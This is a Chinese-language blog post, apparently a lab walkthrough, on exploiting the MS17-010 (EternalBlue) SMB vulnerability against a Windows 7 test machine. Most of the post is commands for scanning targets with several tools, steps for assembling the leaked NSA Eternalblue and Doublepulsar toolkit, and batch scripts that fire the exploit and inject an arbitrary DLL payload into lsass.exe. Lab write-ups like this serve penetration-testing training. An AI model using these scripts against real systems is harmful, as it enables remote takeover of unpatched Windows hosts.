域渗透|浅谈MS17010多种打法（一）-阿里云开发者社区

域渗透|浅谈MS17010多种打法（一）

2023-02-14 483

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： 域渗透|浅谈MS17010多种打法

本文主要介绍NSA原版MS17-010利用
metasploit 利用网上太多了，这里就不介绍了

漏洞介绍

漏洞名称：永恒之蓝

漏洞编号：MS17-010，CVE-2017-0143/0144/0145/0146/0147/0148

漏洞类型：缓冲区溢出漏洞

漏洞影响：Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; Windows Server 2016

实验环境

kali

ip：192.168.0.18

win7

ip：192.168.0.28

a63fdfd1bafc54657576417d94a181ef_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

53dc88861dca073f8cf289fcb0b7b436_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

015a543d999012e7ee663542adfa4b63_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

109bff5ebf4dea7da39f7e1fcfd202cf_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

MS17010检查

checker.py

GitHub：https://github.com/worawit/MS17-010

python2 checker.py 192.168.0.28

205b847198fd8cb4762ad91af1789d10_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

check.bat

GitHub：https://github.com/3gstudent/Smbtouch-Scanner

新建check.bat

@Smbtouch-1.1.1.exe --TargetIp %1 --OutConfig 1.txt
check.bat 192.168.0.28

76d479418df5d191e60aca5c393892cc_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

Ladon

Ladon.exe 192.168.0.28 MS17010

c7bd5db347dd7aeb95a58417a1c86385_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

fscan

fscan -h 192.168.0.28

3c26b78ccd0241d67486a0ec0801c523_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

总之方法有很多，选择自己喜欢的

MS17010利用

有防火墙

参考：

本人没成功，终究还是太菜了

【MS17010打法】 https://www.bilibili.com/video/BV1Ye4y1k7X9/?share_source=copy_web&vd_source=2eb72ea5238fe3398c820713b04697ff

无防火墙

环境和上面不一样，但是不影响

Github：

https://github.com/x0rz/EQGRP_Lost_in_Translation

将工具包中以下三个目录中的文件拷贝到同一个目录中（因为64位系统是支持32位的，所以直接复制32位的就好）：

windows\lib\x86-Windows\

windows\specials\

windows\payloads\

然后在目录中，把Eternalblue-2.2.0.0.xml文件重命名成Eternalblue-2.2.0.xml，Doublepulsar-1.3.1.0.xml改为Doublepulsar-1.3.1.xml

为了方便使用，编写bat脚本

attack.bat 192.168.0.28

@echo off
echo =============== [ TargetIp: %1 ] ===============
Eternalblue-2.2.0.exe --InConfig Eternalblue-2.2.0.xml --TargetIp %1 --TargetPort 445 --Target WIN72K8R2

backdoor.bat 192.168.0.28 exp.dll

@echo off
echo ================================================
echo [info] TargetIp: %1
echo [info] Architecture: %2
echo [info] DllPayload: %3
echo ================================================
Doublepulsar-1.3.1.exe --InConfig Doublepulsar-1.3.1.xml --TargetIp %1 --TargetPort 445 --Protocol SMB --Architecture %2 --Function RunDLL --DllPayload %3 --payloadDllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine "" --NetworkTimeout 60

https://github.com/Telefonica/Eternalblue-Doublepulsar-Metasploit

在deps文件夹，在目录中，把Eternalblue-2.2.0.0.xml文件重命名成Eternalblue-2.2.0.xml，Doublepulsar-1.3.1.0.xml改为Doublepulsar-1.3.1.xml

2d0ef6f69cb52e2994c69cbf4c01c22e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

编写bat脚本，使用方法和上面一样

@echo off
echo =============== [ TargetIp: %1 ] ===============
Eternalblue-2.2.0.exe --TargetIp %1 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig outlog.txt

@echo off
echo ================================================
echo [info] TargetIp: %1
echo [info] Architecture: %2
echo [info] DllPayload: %3
echo ================================================
Doublepulsar-1.3.1.exe --InConfig Doublepulsar-1.3.1.xml --TargetIp %1 --TargetPort 445 --Protocol SMB --Architecture %2 --Function RunDLL --DllPayload %3 --payloadDllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine "" --NetworkTimeout 60

域渗透|浅谈MS17010多种打法（一）

漏洞介绍

实验环境

MS17010检查

checker.py

check.bat

Ladon

fscan

MS17010利用

有防火墙

无防火墙

热门文章

最新文章

相关课程

相关电子书

相关实验场景